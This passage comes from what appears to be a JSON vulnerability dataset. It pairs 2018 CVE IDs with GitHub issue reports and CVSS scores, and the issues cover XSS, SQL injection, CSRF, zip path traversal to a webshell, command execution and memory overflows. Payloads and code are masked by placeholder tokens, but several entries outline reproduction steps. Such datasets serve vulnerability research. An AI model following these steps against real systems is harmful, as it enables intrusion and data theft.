in CVE database (reserved id is: CVETAG ).",
  21173. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  21174. "severity": "HIGH",
  21175. "baseScore": 7.5,
  21176. "impactScore": 3.6,
  21177. "exploitabilityScore": 3.9
  21178. },
  21179. {
  21180. "CVE_ID": "CVE-2018-12684",
  21181. "Issue_Url_old": "https://github.com/civetweb/civetweb/issues/633",
  21182. "Issue_Url_new": "https://github.com/civetweb/civetweb/issues/633",
  21183. "Repo_new": "civetweb/civetweb",
  21184. "Issue_Created_At": "2018-06-15T06:30:26Z",
  21185. "description": "Need an email address to report NUMBERTAG ulnerabilities we've found. Hello, during security auditing of other product that use your library, we have found NUMBERTAG ulnerabilities in civetweb and want to report them to you NUMBERTAG of them is considered to be fatal NUMBERTAG remote memory reveal NUMBERTAG remote code execution) so we want to report by email. We've found this line in PATHTAG \" In case you think you found a security issue that should be evaluated and fixed before public disclosure, feel free to write an email. \u201c But I couldn't find any email address in the docs, would you please offer your email address so we can send the detailed report to you? Thank you. Tencent Blade Team",
  21186. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  21187. "severity": "HIGH",
  21188. "baseScore": 7.1,
  21189. "impactScore": 5.2,
  21190. "exploitabilityScore": 1.8
  21191. },
  21192. {
  21193. "CVE_ID": "CVE-2018-12687",
  21194. "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/84",
  21195. "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/84",
  21196. "Repo_new": "syoyo/tinyexr",
  21197. "Issue_Created_At": "2018-06-22T13:46:12Z",
  21198. "description": "Assert failure. When testcase (see: URLTAG is input into test_tinyexr (command: ./test_tinyexr testcase), a assert failure problem is triggered in APITAG test_tinyexr: APITAG bool APITAG char , const int , const unsigned char , size_t, int, int, int, int, int, int, int, int, size_t, size_t, const APITAG , size_t, const APITAG , const std::vector<long unsigned int>&): Assertion `ret' failed. Aborted",
  21199. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  21200. "severity": "HIGH",
  21201. "baseScore": 7.5,
  21202. "impactScore": 3.6,
  21203. "exploitabilityScore": 3.9
  21204. },
  21205. {
  21206. "CVE_ID": "CVE-2018-12688",
  21207. "Issue_Url_old": "https://github.com/syoyo/tinyexr/issues/83",
  21208. "Issue_Url_new": "https://github.com/syoyo/tinyexr/issues/83",
  21209. "Repo_new": "syoyo/tinyexr",
  21210. "Issue_Created_At": "2018-06-22T13:45:49Z",
  21211. "description": "Segmentation Fault. I build tinyexr with gcc. When testcase (see: URLTAG is input into test_tinyexr (command: ./test_tinyexr testcase), a segmentation fault is triggered. GDB provides information as follow NUMBERTAG f NUMBERTAG in APITAG short , int, int, int, int, unsigned short NUMBERTAG e in APITAG char , unsigned char const , unsigned long, unsigned long, int, APITAG const , int, int NUMBERTAG ad in APITAG char , int const , unsigned char const , unsigned long, int, int, int, int, int, int, int, int, unsigned long, unsigned long, APITAG const , unsigned long, APITAG const , std::vector<unsigned long, std::allocator<unsigned long> > const NUMBERTAG b in APITAG , APITAG const , std::vector<unsigned long long, std::allocator<unsigned long long> > const&, unsigned char const , unsigned long NUMBERTAG cee in APITAG , APITAG const , unsigned char const , unsigned char const , unsigned long, char const NUMBERTAG a NUMBERTAG in APITAG NUMBERTAG a in APITAG NUMBERTAG d0 in APITAG NUMBERTAG f2e1 in main ()",
  21212. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21213. "severity": "CRITICAL",
  21214. "baseScore": 9.8,
  21215. "impactScore": 5.9,
  21216. "exploitabilityScore": 3.9
  21217. },
  21218. {
  21219. "CVE_ID": "CVE-2018-12695",
  21220. "Issue_Url_old": "https://github.com/nsmaomao/mao10cms/issues/2",
  21221. "Issue_Url_new": "https://github.com/nsmaomao/mao10cms/issues/2",
  21222. "Repo_new": "nsmaomao/mao10cms",
  21223. "Issue_Created_At": "2018-06-25T15:47:25Z",
  21224. "description": "Stored XSS at the bbs page. FILETAG",
  21225. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21226. "severity": "MEDIUM",
  21227. "baseScore": 6.1,
  21228. "impactScore": 2.7,
  21229. "exploitabilityScore": 2.8
  21230. },
  21231. {
  21232. "CVE_ID": "CVE-2018-12696",
  21233. "Issue_Url_old": "https://github.com/nsmaomao/mao10cms/issues/3",
  21234. "Issue_Url_new": "https://github.com/nsmaomao/mao10cms/issues/3",
  21235. "Repo_new": "nsmaomao/mao10cms",
  21236. "Issue_Created_At": "2018-06-25T15:57:15Z",
  21237. "description": "Stored XSS at the article. The xss was found at the article page. Ishould set up a topic to write article. FILETAG I post a topic called xss to prove this xss. FILETAG First I input \" APITAG \" at the title and article just like this. FILETAG FILETAG When I submit it, we can see it showing normal FILETAG But if I edit this article again,and input \" APITAG \" at the title it will alert 'xss'.It is stored xss too. FILETAG",
  21238. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21239. "severity": "MEDIUM",
  21240. "baseScore": 6.1,
  21241. "impactScore": 2.7,
  21242. "exploitabilityScore": 2.8
  21243. },
  21244. {
  21245. "CVE_ID": "CVE-2018-12884",
  21246. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/4674",
  21247. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/4674",
  21248. "Repo_new": "octopusdeploy/issues",
  21249. "Issue_Created_At": "2018-06-26T00:55:25Z",
  21250. "description": "Users with incorrect permissions may be able to create Accounts. Under some circumstances, users without the correct permissions, may be able to create new Accounts (under the Infrastructure menu).",
  21251. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  21252. "severity": "MEDIUM",
  21253. "baseScore": 6.5,
  21254. "impactScore": 3.6,
  21255. "exploitabilityScore": 2.8
  21256. },
  21257. {
  21258. "CVE_ID": "CVE-2018-12889",
  21259. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/279",
  21260. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/279",
  21261. "Repo_new": "cn-uofbasel/ccn-lite",
  21262. "Issue_Created_At": "2018-06-26T11:50:27Z",
  21263. "description": "Heap Buffer Overrun in APITAG when reading CCNx or NDN binary file. Description Heap Buffer Overrun in APITAG issued by a non null terminated array when reading an binary CCNx or NDN file. This Heap Buffer Overrun can result in a Heap Corruption when parsing a binary CCNx or NDN file. Steps to reproduce the issue The Heap Corruption can be triggered by a binary NDN file with a longer data than indicated by a the corresponding TLV.",
  21264. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21265. "severity": "CRITICAL",
  21266. "baseScore": 9.8,
  21267. "impactScore": 5.9,
  21268. "exploitabilityScore": 3.9
  21269. },
  21270. {
  21271. "CVE_ID": "CVE-2018-12905",
  21272. "Issue_Url_old": "https://github.com/joyplus/joyplus-cms/issues/427",
  21273. "Issue_Url_new": "https://github.com/joyplus/joyplus-cms/issues/427",
  21274. "Repo_new": "joyplus/joyplus-cms",
  21275. "Issue_Created_At": "2018-06-27T09:19:06Z",
  21276. "description": "i found another xss vul about FILETAG (\u64ad\u653e\u5668\u7ba1\u7406). APITAG FILETAG click \u2018\u7cfb\u7edf\u7ba1\u7406\u2019 (system manage) then click '\u6dfb\u52a0' (add) FILETAG click '\u4fdd\u5b58' (save) then refresh the page FILETAG",
  21277. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21278. "severity": "MEDIUM",
  21279. "baseScore": 6.1,
  21280. "impactScore": 2.7,
  21281. "exploitabilityScore": 2.8
  21282. },
  21283. {
  21284. "CVE_ID": "CVE-2018-12909",
  21285. "Issue_Url_old": "https://github.com/jokkedk/webgrind/issues/112",
  21286. "Issue_Url_new": "https://github.com/jokkedk/webgrind/issues/112",
  21287. "Repo_new": "jokkedk/webgrind",
  21288. "Issue_Created_At": "2018-06-27T00:04:15Z",
  21289. "description": "Local File Disclosure using fileviewer functionality. Line NUMBERTAG in FILETAG lets anyone view all the local files the web server has access to. APITAG Example exploit APITAG Can we avoid relying on user input to get 'file'?",
  21290. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  21291. "severity": "HIGH",
  21292. "baseScore": 7.5,
  21293. "impactScore": 3.6,
  21294. "exploitabilityScore": 3.9
  21295. },
  21296. {
  21297. "CVE_ID": "CVE-2018-12912",
  21298. "Issue_Url_old": "https://github.com/Neeke/HongCMS/issues/4",
  21299. "Issue_Url_new": "https://github.com/neeke/hongcms/issues/4",
  21300. "Repo_new": "neeke/hongcms",
  21301. "Issue_Created_At": "2018-06-26T04:43:47Z",
  21302. "description": "APITAG NUMBERTAG SQL Injection. Vulnerability file: PATHTAG > private function APITAG > { > $this >db >exe(\"DELETE FROM APITAG \"); > $msg = '\u5df2\u5b8c\u6210\u6e05\u7a7a\u6570\u636e\u5e93\u8868: ' . $tablename . ' APITAG '; > > return $msg; > } The $tablename parameter controllable. POC APITAG Privilege): > PATHTAG FILETAG",
  21303. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  21304. "severity": "HIGH",
  21305. "baseScore": 7.2,
  21306. "impactScore": 5.9,
  21307. "exploitabilityScore": 1.2
  21308. },
  21309. {
  21310. "CVE_ID": "CVE-2018-12914",
  21311. "Issue_Url_old": "https://github.com/sanluan/PublicCMS/issues/13",
  21312. "Issue_Url_new": "https://github.com/sanluan/publiccms/issues/13",
  21313. "Repo_new": "sanluan/publiccms",
  21314. "Issue_Created_At": "2018-06-27T10:03:08Z",
  21315. "description": "There is a APITAG Unzip\" vulnerability that can get webshell. ver NUMBERTAG using a specially crafted zip archive, that holds path traversal APITAG you used unzip method you will get a shell a zip looks like this: FILETAG the path you will get from there: FILETAG (so,your website true path is PATHTAG ) upload and unzip FILETAG FILETAG APITAG will write into your server FILETAG Execute the command FILETAG FILETAG",
  21316. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21317. "severity": "CRITICAL",
  21318. "baseScore": 9.8,
  21319. "impactScore": 5.9,
  21320. "exploitabilityScore": 3.9
  21321. },
  21322. {
  21323. "CVE_ID": "CVE-2018-12915",
  21324. "Issue_Url_old": "https://github.com/cloudwu/pbc/issues/118",
  21325. "Issue_Url_new": "https://github.com/cloudwu/pbc/issues/118",
  21326. "Repo_new": "cloudwu/pbc",
  21327. "Issue_Created_At": "2018-06-27T07:32:26Z",
  21328. "description": "global buffer overflow in calc_hash APITAG Hello.I use my company tool.I found two APITAG is first APITAG I want to provide more information.I hope will hope your guys.",
  21329. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21330. "severity": "CRITICAL",
  21331. "baseScore": 9.8,
  21332. "impactScore": 5.9,
  21333. "exploitabilityScore": 3.9
  21334. },
  21335. {
  21336. "CVE_ID": "CVE-2018-12916",
  21337. "Issue_Url_old": "https://github.com/cloudwu/pbc/issues/120",
  21338. "Issue_Url_new": "https://github.com/cloudwu/pbc/issues/120",
  21339. "Repo_new": "cloudwu/pbc",
  21340. "Issue_Created_At": "2018-06-27T07:47:36Z",
  21341. "description": "Segmentation fault in APITAG (). Hello.I use my company tool.I found two Segmentation APITAG is first APITAG I want to provide more information.I hope will hope your guys.",
  21342. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21343. "severity": "CRITICAL",
  21344. "baseScore": 9.8,
  21345. "impactScore": 5.9,
  21346. "exploitabilityScore": 3.9
  21347. },
  21348. {
  21349. "CVE_ID": "CVE-2018-12917",
  21350. "Issue_Url_old": "https://github.com/cloudwu/pbc/issues/119",
  21351. "Issue_Url_new": "https://github.com/cloudwu/pbc/issues/119",
  21352. "Repo_new": "cloudwu/pbc",
  21353. "Issue_Created_At": "2018-06-27T07:37:01Z",
  21354. "description": "heap buffer overflow in APITAG APITAG Hello.I use my company tool.I found two APITAG is Second APITAG I want to provide more information.I hope will hope your guys.",
  21355. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21356. "severity": "CRITICAL",
  21357. "baseScore": 9.8,
  21358. "impactScore": 5.9,
  21359. "exploitabilityScore": 3.9
  21360. },
  21361. {
  21362. "CVE_ID": "CVE-2018-12918",
  21363. "Issue_Url_old": "https://github.com/cloudwu/pbc/issues/121",
  21364. "Issue_Url_new": "https://github.com/cloudwu/pbc/issues/121",
  21365. "Repo_new": "cloudwu/pbc",
  21366. "Issue_Created_At": "2018-06-27T07:51:36Z",
  21367. "description": "Segmentation fault in . Hello.I use my company tool.I found two Segmentation APITAG is Second APITAG I want to provide more information.I hope will hope your guys.",
  21368. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21369. "severity": "CRITICAL",
  21370. "baseScore": 9.8,
  21371. "impactScore": 5.9,
  21372. "exploitabilityScore": 3.9
  21373. },
  21374. {
  21375. "CVE_ID": "CVE-2018-12972",
  21376. "Issue_Url_old": "https://github.com/OpenTSDB/opentsdb/issues/1239",
  21377. "Issue_Url_new": "https://github.com/opentsdb/opentsdb/issues/1239",
  21378. "Repo_new": "opentsdb/opentsdb",
  21379. "Issue_Created_At": "2018-06-29T02:55:11Z",
  21380. "description": "vulnerability! remote command execute in 'q' request method. many parameters which in \u2018q\u2019 request method can execute command, including o, key, style, yrange and its json input, y2range and its json input. url: opentsdb APITAG ps: opentsdb a.b.com is a host which use opentsdb service. poc: take 'o' parameter as example, requeset url: opentsdb APITAG c NUMBERTAG APITAG response: show ping infomations.",
  21381. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21382. "severity": "CRITICAL",
  21383. "baseScore": 9.8,
  21384. "impactScore": 5.9,
  21385. "exploitabilityScore": 3.9
  21386. },
  21387. {
  21388. "CVE_ID": "CVE-2018-12973",
  21389. "Issue_Url_old": "https://github.com/OpenTSDB/opentsdb/issues/1240",
  21390. "Issue_Url_new": "https://github.com/opentsdb/opentsdb/issues/1240",
  21391. "Repo_new": "opentsdb/opentsdb",
  21392. "Issue_Created_At": "2018-06-29T03:03:34Z",
  21393. "description": "vulnerability! XSS in \u2018q\u2019 request method. there is XSS in parameter 'json' of \u2018q\u2019 request method. url and payload: opentsdb APITAG APITAG <\" ps: opentsdb a.b.com is a host which use opentsdb service.",
  21394. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21395. "severity": "MEDIUM",
  21396. "baseScore": 6.1,
  21397. "impactScore": 2.7,
  21398. "exploitabilityScore": 2.8
  21399. },
  21400. {
  21401. "CVE_ID": "CVE-2018-12988",
  21402. "Issue_Url_old": "https://github.com/GreenCMS/GreenCMS/issues/111",
  21403. "Issue_Url_new": "https://github.com/greencms/greencms/issues/111",
  21404. "Repo_new": "greencms/greencms",
  21405. "Issue_Created_At": "2018-06-27T01:32:12Z",
  21406. "description": "APITAG NUMBERTAG payload GET /greencms APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: zh CN,zh; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: URLTAG APITAG APITAG APITAG DNT NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG id\u53c2\u6570\u503c\u4e3abase NUMBERTAG APITAG \u89e3\u7801\u4e3a\uff1a PATHTAG",
  21407. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  21408. "severity": "HIGH",
  21409. "baseScore": 7.5,
  21410. "impactScore": 3.6,
  21411. "exploitabilityScore": 3.9
  21412. },
  21413. {
  21414. "CVE_ID": "CVE-2018-12993",
  21415. "Issue_Url_old": "https://github.com/rocktronica/OneFileCMS/issues/6",
  21416. "Issue_Url_new": "https://github.com/rocktronica/onefilecms/issues/6",
  21417. "Repo_new": "rocktronica/onefilecms",
  21418. "Issue_Created_At": "2018-06-28T15:39:39Z",
  21419. "description": "the username and password can be bruted. FILETAG",
  21420. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21421. "severity": "CRITICAL",
  21422. "baseScore": 9.8,
  21423. "impactScore": 5.9,
  21424. "exploitabilityScore": 3.9
  21425. },
  21426. {
  21427. "CVE_ID": "CVE-2018-12994",
  21428. "Issue_Url_old": "https://github.com/rocktronica/OneFileCMS/issues/7",
  21429. "Issue_Url_new": "https://github.com/rocktronica/onefilecms/issues/7",
  21430. "Repo_new": "rocktronica/onefilecms",
  21431. "Issue_Created_At": "2018-06-28T16:12:08Z",
  21432. "description": "The \" New APITAG \" button cause getshell. FILETAG use username and password login the page type New filename ' FILETAG ' click Create FILETAG FILETAG created successfully. FILETAG click FILETAG write below APITAG click save FILETAG NUMBERTAG php saved successfully. PATHTAG FILETAG",
  21433. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  21434. "severity": "HIGH",
  21435. "baseScore": 8.8,
  21436. "impactScore": 5.9,
  21437. "exploitabilityScore": 2.8
  21438. },
  21439. {
  21440. "CVE_ID": "CVE-2018-12996",
  21441. "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/7",
  21442. "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/7",
  21443. "Repo_new": "unh3x/just4cve",
  21444. "Issue_Created_At": "2018-06-28T15:46:12Z",
  21445. "description": "Zoho manageengine Applications Manager Reflected XSS. ================= Zoho manageengine Applications Manager Reflected XSS ================= Date: PATHTAG Software Link: FILETAG Category: Web Application Exploit Author: M3 MENTIONTAG From APITAG CVE: ================= Proof of Concept: ================= APITAG notice: It can be successfully reproduced under IE.",
  21446. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21447. "severity": "MEDIUM",
  21448. "baseScore": 6.1,
  21449. "impactScore": 2.7,
  21450. "exploitabilityScore": 2.8
  21451. },
  21452. {
  21453. "CVE_ID": "CVE-2018-12997",
  21454. "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/8",
  21455. "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/8",
  21456. "Repo_new": "unh3x/just4cve",
  21457. "Issue_Created_At": "2018-06-28T15:56:42Z",
  21458. "description": "Zoho manageengine Arbitrary File Read in multiple Products. ================= Zoho manageengine Arbitrary File Read in multiple Products ================= Date: PATHTAG Software Link: FILETAG Category: Web Application Affected Products: Netflow Analyzer Network Configuration Manager APITAG Oputils Opmanagerplus firewall analyzer Exploit Author: M3 MENTIONTAG From APITAG CVE: ================= Vulnerable cgi: ================= APITAG ================= Proof of Concept: ================= CODETAG FILETAG Notice: This vul can reproduce without login.",
  21459. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  21460. "severity": "HIGH",
  21461. "baseScore": 7.5,
  21462. "impactScore": 3.6,
  21463. "exploitabilityScore": 3.9
  21464. },
  21465. {
  21466. "CVE_ID": "CVE-2018-12998",
  21467. "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/10",
  21468. "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/10",
  21469. "Repo_new": "unh3x/just4cve",
  21470. "Issue_Created_At": "2018-06-28T16:10:44Z",
  21471. "description": "Zoho manageengine Arbitrary Reflected XSS in multiple Products . ================= Zoho manageengine XSS in multiple Products ================= Date: PATHTAG Software Link: FILETAG Category: Web Application Affected Products: Netflow Analyzer Network Configuration Manager APITAG Oputils Opmanagerplus firewall analyzer Exploit Author: M3 MENTIONTAG From APITAG CVE: ================= Vulnerable cgi: ================= APITAG ================= Proof of Concept: ================= APITAG FILETAG Notice: This vul can reproduce without login.",
  21472. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  21473. "severity": "MEDIUM",
  21474. "baseScore": 6.1,
  21475. "impactScore": 2.7,
  21476. "exploitabilityScore": 2.8
  21477. },
  21478. {
  21479. "CVE_ID": "CVE-2018-12999",
  21480. "Issue_Url_old": "https://github.com/unh3x/just4cve/issues/9",
  21481. "Issue_Url_new": "https://github.com/unh3x/just4cve/issues/9",
  21482. "Repo_new": "unh3x/just4cve",
  21483. "Issue_Created_At": "2018-06-28T16:04:32Z",
  21484. "description": "Zoho manageengine Desktop Central Arbitrary File Deletion. ================= Zoho manageengine Desktop Central Arbitrary File Deletion ================= Date: PATHTAG Software Link: URLTAG Category: Web Application Exploit Author: M3 MENTIONTAG From APITAG CVE: ================= Vulnerable cgi ================= APITAG ================= Proof of Concept: ================= CODETAG notice: It can be successfully reproduced without login info.",
  21485. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  21486. "severity": "HIGH",
  21487. "baseScore": 7.5,
  21488. "impactScore": 3.6,
  21489. "exploitabilityScore": 3.9
  21490. },
  21491. {
  21492. "CVE_ID": "CVE-2018-13005",
  21493. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1088",
  21494. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1088",
  21495. "Repo_new": "gpac/gpac",
  21496. "Issue_Created_At": "2018-06-28T08:55:42Z",
  21497. "description": "in box_code_base.c line NUMBERTAG has a heap overflow.. Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! [ x ] I looked for a similar issue and couldn't find any. [ x ] I tried with the latest version of GPAC. Installers available at github commit NUMBERTAG I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command line ...). I can share files anonymously with this dropbox: URLTAG Detailed guidelines: URLTAG in box_code_base.c [line NUMBERTAG URLTAG has a heap overflow. CODETAG When you end the while loop, you access tmpname[to_read NUMBERTAG causing a heap overflow. You should change it like this APITAG",
  21498. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21499. "severity": "CRITICAL",
  21500. "baseScore": 9.8,
  21501. "impactScore": 5.9,
  21502. "exploitabilityScore": 3.9
  21503. },
  21504. {
  21505. "CVE_ID": "CVE-2018-13007",
  21506. "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/29",
  21507. "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/29",
  21508. "Repo_new": "gopro/gpmf-parser",
  21509. "Issue_Created_At": "2018-06-29T03:40:40Z",
  21510. "description": "three heap overflow in GPMF_parser.c in function APITAG three heap overflow in GPMF_parser.c line NUMBERTAG line NUMBERTAG line NUMBERTAG in function APITAG fix it like this APITAG asan report ERRORTAG FILETAG",
  21511. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21512. "severity": "CRITICAL",
  21513. "baseScore": 9.8,
  21514. "impactScore": 5.9,
  21515. "exploitabilityScore": 3.9
  21516. },
  21517. {
  21518. "CVE_ID": "CVE-2018-13010",
  21519. "Issue_Url_old": "https://github.com/wstmall/wstmall/issues/4",
  21520. "Issue_Url_new": "https://github.com/wstmall/wstmall/issues/4",
  21521. "Repo_new": "wstmall/wstmall",
  21522. "Issue_Created_At": "2018-06-28T14:07:25Z",
  21523. "description": "CSRF that can add or delete user account. This vulnerability was found at the admin page. FILETAG As we can see NUMBERTAG users' integral are NUMBERTAG It was created by CSRF. CODETAG If we post this form and admin click it, it will add an account. Attacker can use this to earn integral maliciously FILETAG Attacker also can delete any account include store account by CSRF There are NUMBERTAG store accounts to test FILETAG",
  21524. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  21525. "severity": "HIGH",
  21526. "baseScore": 8.8,
  21527. "impactScore": 5.9,
  21528. "exploitabilityScore": 2.8
  21529. },
  21530. {
  21531. "CVE_ID": "CVE-2018-13011",
  21532. "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/31",
  21533. "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/31",
  21534. "Repo_new": "gopro/gpmf-parser",
  21535. "Issue_Created_At": "2018-06-29T06:45:10Z",
  21536. "description": "a heap buffer overflow in GPMF_parser.c line NUMBERTAG in functions APITAG a heap buffer overflow in GPMF_parser.c line NUMBERTAG in functions APITAG asan report ERRORTAG FILETAG",
  21537. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21538. "severity": "CRITICAL",
  21539. "baseScore": 9.8,
  21540. "impactScore": 5.9,
  21541. "exploitabilityScore": 3.9
  21542. },
  21543. {
  21544. "CVE_ID": "CVE-2018-13021",
  21545. "Issue_Url_old": "https://github.com/Neeke/HongCMS/issues/5",
  21546. "Issue_Url_new": "https://github.com/neeke/hongcms/issues/5",
  21547. "Repo_new": "neeke/hongcms",
  21548. "Issue_Created_At": "2018-06-29T06:43:03Z",
  21549. "description": "Arbitrary File Upload Getshell . Steps To Reproduce NUMBERTAG Login to the backstage as the admin NUMBERTAG POST ERRORTAG NUMBERTAG shell is FILETAG FILETAG FILETAG",
  21550. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  21551. "severity": "HIGH",
  21552. "baseScore": 7.2,
  21553. "impactScore": 5.9,
  21554. "exploitabilityScore": 1.2
  21555. },
  21556. {
  21557. "CVE_ID": "CVE-2018-13026",
  21558. "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/32",
  21559. "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/32",
  21560. "Repo_new": "gopro/gpmf-parser",
  21561. "Issue_Created_At": "2018-06-30T03:34:43Z",
  21562. "description": "a heap buffer overflow in APITAG function APITAG a heap buffer overflow in APITAG function APITAG ERRORTAG FILETAG",
  21563. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  21564. "severity": "CRITICAL",
  21565. "baseScore": 9.8,
  21566. "impactScore": 5.9,
  21567. "exploitabilityScore": 3.9
  21568. },
  21569. {
  21570. "CVE_ID": "CVE-2018-13030",
  21571. "Issue_Url_old": "https://github.com/kornelski/jpeg-compressor/issues/12",
  21572. "Issue_Url_new": "https://github.com/kornelski/jpeg-compressor/issues/12",
  21573. "Repo_new": "kornelski/jpeg-compressor",
  21574. "Issue_Created_At": "2018-06-30T08:57:29Z",
  21575. "description": "A crash with specific image:stack buffer overflow. I use Clang NUMBERTAG and APITAG to build jpeg compressor NUMBERTAG this file URLTAG can cause stack buffer overflow when executing this command: APITAG This is the ASAN information: ERRORTAG",
  21576. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  21577. "severity": "HIGH",
  21578. "baseScore": 7.8,
  21579. "impactScore": 5.9,
  21580. "exploitabilityScore": 1.8
  21581. },
  21582. {
  21583. "CVE_ID": "CVE-2018-13031",
  21584. "Issue_Url_old": "https://github.com/AutismJH/damicms/issues/6",
  21585. "Issue_Url_new": "https://github.com/autismjh/damicms/issues/6",
  21586. "Repo_new": "autismjh/damicms",
  21587. "Issue_Created_At": "2019-12-02T15:35:30Z",
  21588. "description": "Bug NUMBERTAG Cross site request APITAG admin). There is an Cross site request forgery vulnerability in your latest version of the CMS NUMBERTAG Download link: \" FILETAG \" Vulnerability trigger point: URLTAG APITAG in as admin FILETAG APITAG this part FILETAG FILETAG APITAG the package to generate a POC file and run it FILETAG APITAG page has changed FILETAG NUMBERTAG check source code There are some codes check token, but as if not take function FILETAG We find the default PATHTAG 'TOKEN_ON' => false, Means not user token, so have the Cross site request forgery vulnerability FILETAG",
  21589. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  21590. "severity": "HIGH",
  21591. "baseScore": 8.8,
  21592. "impactScore": 5.9,
  21593. "exploitabilityScore": 2.8
  21594. },
  21595. {
  21596. "CVE_ID": "CVE-2018-13037",
  21597. "Issue_Url_old": "https://github.com/kornelski/jpeg-compressor/issues/13",
  21598. "Issue_Url_new": "https://github.com/kornelski/jpeg-compressor/issues/13",
  21599. "Repo_new": "kornelski/jpeg-compressor",
  21600. "Issue_Created_At": "2018-07-01T04:08:57Z",
  21601. "description": "A crash with specific image:heap buffer overflow in function bmp_load. I use Clang NUMBERTAG and APITAG to build jpeg compressor NUMBERTAG this file URLTAG can cause heap_buffer_overflow when executing this command: APITAG This is the ASAN information: ERRORTAG",
  21602. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  21603. "severity": "HIGH",
  21604. "baseScore": 7.8,
  21605. "impactScore": 5.9,
  21606. "exploitabilityScore": 1.8
  21607. },
  21608. {
  21609. "CVE_ID": "CVE-2018-13038",
  21610. "Issue_Url_old": "https://github.com/OpenSID/OpenSID/issues/1177",
  21611. "Issue_Url_new": "https://github.com/opensid/opensid/issues/1177",
  21612. "Repo_new": "opensid/opensid",
  21613. "Issue_Created_At": "2018-07-01T09:10:19Z",
